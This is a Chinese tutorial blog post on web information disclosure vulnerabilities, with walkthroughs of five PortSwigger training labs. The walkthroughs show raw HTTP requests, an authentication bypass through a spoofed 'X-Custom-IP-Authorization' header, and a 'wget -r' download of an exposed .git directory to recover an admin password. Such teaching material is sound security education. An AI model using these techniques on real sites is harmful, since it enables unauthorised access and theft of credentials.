公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞
欢迎关注订阅专栏!
WEB安全系列包括如下三个专栏:
- 《WEB安全基础-服务器端漏洞》
- 《WEB安全基础-客户端漏洞》
- 《WEB安全高级-综合利用》
知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路!
欢迎关注订阅专栏!
- 专栏文章追求对知识点的全面总结,逻辑严密,方便学习掌握。力求做到看完一篇文章,掌握一类漏洞知识。让读者简洁高效的掌握WEB安全知识框架,推开入门深造的大门。
- 绝不为了追求文章数量,彰显内容丰富而故意拆散相关知识点。避免读者沉迷在无尽的技巧中而迷失进阶的道路!本系列的目标是授之以渔,而不仅仅是技巧的堆砌。
- 每篇文章均配有大量靶场,点击文章中靶场名即可跳转练习(靶场在网站注册即可免费使用)。
- 欢迎订阅专栏!建议学完两个基础专栏,再学习高级哦~
WEB安全基础入门—信息泄露漏洞
- 1. 什么是信息泄露漏洞
- 2. 通常泄露信息的途径
- 3. 信息泄露引起的原因
- 3. 漏洞利用
- 1. 探测漏洞存在
- 2. 报错信息中的信息泄露
- 3. 隐藏路径中包含敏感信息
- 4. 通过备份文件查看源代码
- 5. 错误配置导致信息泄露
- 6. 版本控制历史信息泄露
- 4. 漏洞实例
- 1. 错误消息中的信息泄漏([Information disclosure in error messages](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-error-messages))
- 2. 调试页面上的信息泄露([Information disclosure on debug page](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page))
- 3. 通过备份文件泄露源代码([Source code disclosure via backup files](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-via-backup-files))
- 4. 通过信息泄露绕过身份验证([Authentication bypass via information disclosure](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass))
- 5. 版本控制历史中的信息泄漏 ([Information disclosure in version control history](https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history))
1. 什么是信息泄露漏洞
网站或应用在响应中无意间泄露的敏感信息,攻击者获取到这些敏感信息为后续攻击做准备。泄露的信息主要包括以下三类:
- 其他账户的数据或财务信息意外泄露
- 敏感业务数据泄露
- 网站及其基础架构技术细节信息泄露
2. 通常泄露信息的途径
- 扫描获得的网站目录和文件信息。
/cgi-bin/phpinfo
等等 /robots.txt
、/sitemap.xml
君子协定文件里的路径文件信息- 遗漏的临时备份的源代码文件
/.git
/backup
等 - 数据库报错或异常响应信息中反馈的内容
- 应用反馈过多的非必要展示信息
- 硬编码写在源码中的API KEY 、IP地址、数据库信息等
3. 信息泄露引起的原因
- 开发遗留的部分信息,未在上线前进行清理。
- 不安全的配置导致。比如debug模式上线后未关闭,导致在公开使用时,泄露大量调试报错信息。
- 程序设计和实现缺陷。
3. 漏洞利用
1. 探测漏洞存在
渗透测试的一项关键技能是能够随时随地识别有价值的信息。下面的几个具体方法可以用来探测漏洞是否存在:
- 输入混淆的参数
一旦对某个参数感兴趣,可以将该参数值进行混淆输入,观察应用响应。这一步可使用Burp爆破模块进行大量自动化的混淆测试。
- 使用扫描器对网站进行扫描
- 使用Burp或其他相关工具探寻信息
- search-能在监测的所有数据包中快速筛选指定内容。
- find comments-在检测的所有数据包和文件中,快速查找注释
- discover content-内容探测,发现隐藏的路径、敏感信息和文件
- 使用各种方式,诱使应用响应报错信息
2. 报错信息中的信息泄露
例题1
3. 隐藏路径中包含敏感信息
例题2
4. 通过备份文件查看源代码
例题 3
5. 错误配置导致信息泄露
例题4
6. 版本控制历史信息泄露
在开发阶段经常使用版本控制系统,例如Git 在路径扫描中有时能发现路径/.git
可在攻击端安装Git,直接拉取下载,来获取部分源代码
例题5
4. 漏洞实例
1. 错误消息中的信息泄漏(Information disclosure in error messages)
抓取数据包/product?productId=20
随意在后面加个特殊符号如'
尝试引起报错。
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 1511Internal Server Error: java.lang.NumberFormatException: For input string: "20'"at java.base/java.lang.NumberFormatException.forInputString(NumberFormatException.java:67)at java.base/java.lang.Integer.parseInt(Integer.java:668)at java.base/java.lang.Integer.parseInt(Integer.java:786).......at java.base/java.lang.Thread.run(Thread.java:833)Apache Struts 2 2.3.31
2. 调试页面上的信息泄露(Information disclosure on debug page)
3. 通过备份文件泄露源代码(Source code disclosure via backup files)
- 解题思路
- 存在
/robots.txt
- 存在
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Connection: close
Content-Length: 32User-agent: *
Disallow: /backup
- 访问
/backup
存在源代码备份,从中找到数据库密码
4. 通过信息泄露绕过身份验证(Authentication bypass via information disclosure)
指定header为本地的用户才有权限访问admin, 删除账户carlos
测试账户:wiener:peter
- 解题思路
- 扫描发现
/admin
页面,尝试访问。
- 扫描发现
Admin interface only available to local users
- 使用TRACE 方法 访问该页面发现
X-Custom-IP-Authorization: IP
TRACE /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
Origin: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx
HTTP/1.1 200 OK
Content-Type: message/http
Connection: close
Content-Length: 416TRACE /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
Origin: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx
X-Custom-IP-Authorization: IP
- 在访问
GET /admin
设置X-Custom-IP-Authorization: 127.0.0.1
成功绕过限制
GET /admin/ HTTP/1.1
Host: acd91ff31f481bb2c0acb121008d007b.web-security-academy.net
X-Custom-IP-Authorization: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Connection: close
Cookie: session=CdwDkeDYoxOtc7RD83dIx71oQaL2kwRx
5. 版本控制历史中的信息泄漏 (Information disclosure in version control history)
扫描发信版本控制路径/.git
使用linux命令拉取下载
wget -r https://your-lab-id.web-security-academy.net/.git/
0000000000000000000000000000000000000000 4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 Carlos Montoya <carlos@evil-user.net> 1654060361 +0000 commit (initial): Add skeleton admin panel
4e09c0b6424c3d3ef8c3a5bc704d8267f2734808 bc92290a11f85897017c0ff4d0e0a89505f8fbcf Carlos Montoya <carlos@evil-user.net> 1654060361 +0000 commit: Remove admin password from config
使用diff命令查看变化,可获取到administrator密码
公司账号密码、通信录泄露屡见不鲜,肆意流淌的敏感信息:WEB安全基础入门—信息泄露漏洞相关推荐
- 【Quartz】解密properties配置文件中的账号密码
在配置quartz时,为了保密某些信息(特别是账号密码),通常会使用密文.那么在实际使用这些配置信息时,需要进行解密.本文提供一种解密方法如下: (1)假设在properties文件中加密了账号密码 ...
- spotify电脑下载歌曲_流媒体音乐平台Spotify部分账号密码泄露 并非数据库泄露而是撞库...
流媒体音乐平台 Spotify 日前发布安全警告称 , 监测到多达35万名该平台用户账号出现异地登录和异常操作问题.该公司向受影响的用户发出安全邮件提醒用户尽快修改密码,否则自己的账号可能会在世界各地 ...
- Kyan网络监控设备账号密码泄露漏洞
1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台. 2.网络资产查找 F ...
- 如何预防账号密码泄露等安全问题
我个人对黑客和网络安全比较感兴趣,时常关注这方面的新闻.我们知道这些安全问题都是软件程序有Bug导致的,例如CSDN的数据库泄露事件.携程泄露用户银行卡信息事件.电商网站被用户篡改购买支付金额等等. ...
- Kyan 网络监控设备 hosts 账号密码泄露漏洞
漏洞描述 Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 漏洞影响 s ✅Kyan 空间测绘 d ⭕title="platform - Login&q ...
- 中科网威 下一代防火墙控制系统 账号密码泄露漏洞
漏洞描述 i ⭐中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台 漏洞影响 s ✅中科网威 下一代防火墙控制系统 空间测绘 d ⭕FOF ...
- 海康流媒体管理服务器账号密码泄露漏洞
海康流媒体管理服务器账号密码泄露漏洞 1.海康流媒体管理服务器账号密码泄露漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.FOFA 2.漏洞复现 2.1.登录页面 2.2.POC 2.3.登录验证 ...
- 也许你的账号密码就是这样泄露了!
点击上方"程序人生",选择"置顶公众号" 第一时间关注程序猿(媛)身边的故事 图片源自unsplash 作者 fightjiang 如需转载,请联系原作者授权. ...
- D-Link DCS系列监控账号密码信息泄露
简介: 漏洞编号:CVE-2020-25078 D-Link DCS是网络监控摄像机设备,通过访问特定的URL可以得到账号密码信息,攻击方可以 直接进入利用漏洞得到账户密码直接进入后台获取视频监控页面 ...
- D-Link DCS系列监控 账号密码信息泄露漏洞
漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classif ...
最新文章
- 杨学海:跨境电商新通道-进口保税直邮模式解析
- spring中间scope详细解释
- myloader原理解析
- ICML 2020 | 基于连续动态系统学习更加灵活的位置编码
- 80端口被system(pid=4)占用的解决方法
- 文件夹复制 覆盖_软网应用:U盘即插即复制
- Linux Vi的使用
- nginx 常用命令整理
- 【AudioVideo】处理音频输出的变化(13)
- 三星S10+真机上手视频流出:屏下指纹让强迫症不忍直视
- pagehelper的使用_Spring Boot 2.x(十三):你不知道的PageHelper
- 【OpenCV】矩阵掩模操作
- 记录es几个问题,增删改查,索引创建
- php 验证码不正确,php验证码提示错误
- Win10上装SAS
- 广告系统,业务与架构细节
- java调用默认打印机打印发货标签
- 鸿蒙系统剽窃,外媒再爆猛料!质疑华为鸿蒙系统抄袭:被指山寨谷歌安卓11系统...
- 如何将一个向量投影到一个平面上_向量的各种积
- 2022春招实习面经【美团、阿里、微软、字节、米哈游】
热门文章
- 黑马程序员—黑马程序员CEO方立勋致全体员工和同学们的公开信
- 数据结构课程设计——宿舍管理查询软件
- 微型计算机控制程序题,微机控制技术》习题集
- 2.vue的不更新特性-重用机制和key属性-data及其他字段-vue生命周期
- foobar2000 Mac版终于来了
- 计算机二级公共基础知识个人整理
- win10 64位下Oracle10g安装
- mysql-connector-java-8.0.26-bin.jar 包含bin的jar下载
- 苹果无线笔记本怎么连不上win服务器,苹果笔记本连不上无线_苹果笔记本连不上wifi...
- vsCode PlatformIO + jlink + GD32VF103